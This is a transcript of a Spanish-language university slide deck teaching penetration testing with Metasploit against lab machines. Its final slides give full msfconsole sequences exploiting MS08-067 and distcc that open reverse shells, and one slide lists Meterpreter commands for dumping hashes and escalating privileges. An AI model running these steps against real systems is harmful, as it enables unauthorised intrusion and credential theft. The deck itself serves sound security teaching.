Metasploit
-
Upload
cristian-rojas -
Category
Devices & Hardware
-
view
285 -
download
1
description
Transcript of Metasploit
![Page 1: Metasploit](https://reader034.fdocuments.mx/reader034/viewer/2022051109/5479a98cb4af9fda418b4599/html5/thumbnails/1.jpg)
METASPLOIT
Cristian Alejandro Rojas [email protected]
Universidad Distrital Francisco José de Caldas
![Page 2: Metasploit](https://reader034.fdocuments.mx/reader034/viewer/2022051109/5479a98cb4af9fda418b4599/html5/thumbnails/2.jpg)
Etapas del hacking ético
![Page 3: Metasploit](https://reader034.fdocuments.mx/reader034/viewer/2022051109/5479a98cb4af9fda418b4599/html5/thumbnails/3.jpg)
Qué es un test de penetración?
• Simulación de un ataque real
• Obtener una autorización para hacer el ataque
• Reportar al cliente los descubrimientos y recomendaciones
• Encontrar y arreglar vulnerabilidades antes de que un atacante real las pueda explotar
![Page 4: Metasploit](https://reader034.fdocuments.mx/reader034/viewer/2022051109/5479a98cb4af9fda418b4599/html5/thumbnails/4.jpg)
Objetivos en el laboratorio
• Windows XP SP3
10.20…….
• Ubuntu Linux 8.04Metasploitable
10.20……
![Page 5: Metasploit](https://reader034.fdocuments.mx/reader034/viewer/2022051109/5479a98cb4af9fda418b4599/html5/thumbnails/5.jpg)
Terminologia
• Exploit: Vector para penetrar el sistema.
• Payload: Es la “bomba” que estalla una vez está adentro del sistema.
• Encoder: Codificador del payload.
• Shellcode: Un set de instrucciones usado como payload.
• Listener: Escucha para una conexión entrante.
• Session: Conexión de un exploit exitoso
![Page 6: Metasploit](https://reader034.fdocuments.mx/reader034/viewer/2022051109/5479a98cb4af9fda418b4599/html5/thumbnails/6.jpg)
METASPLOIT
• Framework de explotación de vulnerabilidades
• Basado en Ruby
• Modular
• Exploits, Payloads, Auxiliaries.
![Page 7: Metasploit](https://reader034.fdocuments.mx/reader034/viewer/2022051109/5479a98cb4af9fda418b4599/html5/thumbnails/7.jpg)
Interfaces
• MSFconsole: Es la mas conocida, provee acceso a la gran mayoría de las opciones del framework. (Intecractiva).
![Page 8: Metasploit](https://reader034.fdocuments.mx/reader034/viewer/2022051109/5479a98cb4af9fda418b4599/html5/thumbnails/8.jpg)
Interfaces
• MSFCli: Sirve para correr un ataque directamente desde la consola sin necesidad de ser interactivo.
![Page 9: Metasploit](https://reader034.fdocuments.mx/reader034/viewer/2022051109/5479a98cb4af9fda418b4599/html5/thumbnails/9.jpg)
Utilidades
• MSFPayload: Es capaz de generar un ejecutable con el payload solamente.
![Page 10: Metasploit](https://reader034.fdocuments.mx/reader034/viewer/2022051109/5479a98cb4af9fda418b4599/html5/thumbnails/10.jpg)
Interactuando con msfconsole
• use <module> - Configura el exploit a usar
• set <x X> - Configura un parametro
• setg <x X> - Define un parametro globalmente
• show <x> - Muestra un <x> (exploits, payloads, options, etc)
• help <x> - Muestra ayuda acerca de X
• Info <module> muestra información acerca de un módulo
• exploit – Ejecuta el módulo seleccionado.
![Page 11: Metasploit](https://reader034.fdocuments.mx/reader034/viewer/2022051109/5479a98cb4af9fda418b4599/html5/thumbnails/11.jpg)
Meterpreter
• Payload
• Nunca escribe en el disco, solo corre en memoria.
• Provee comandos con funcionalidades adicionales: help, background, ps, migrate, getuid, download, upload, hashdump, shell.
• Facilita escalamiento de privilegios (getsystem).
![Page 12: Metasploit](https://reader034.fdocuments.mx/reader034/viewer/2022051109/5479a98cb4af9fda418b4599/html5/thumbnails/12.jpg)
Metasploitable
• Ubuntu 8.08
• Entorno para practicar explotación de vulnerabilidades
• Vulnerabilidades de sistema operativo y también web.
![Page 13: Metasploit](https://reader034.fdocuments.mx/reader034/viewer/2022051109/5479a98cb4af9fda418b4599/html5/thumbnails/13.jpg)
Explotando una vulnerabilidad en Windows XP SP3
• Ms08_67 -> Vulnerabilidad numero 67 reportada en 2008 aceptada por microsoft.
search windows/smb
info windows/smb/ms08_067_netapi
use windows/smb/ms08_067_netapi
show payloads
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.20.22
exploit
![Page 14: Metasploit](https://reader034.fdocuments.mx/reader034/viewer/2022051109/5479a98cb4af9fda418b4599/html5/thumbnails/14.jpg)
Explotando una vulnerabilidad en metasploitable (Linux)
search distcc
use unix/misc/distcc_exec
show payloads
set payload cmd/unix/reverse
show options
set rhost 192.168.20.23
set lhost 192.168.20.102 (ip local)
exploit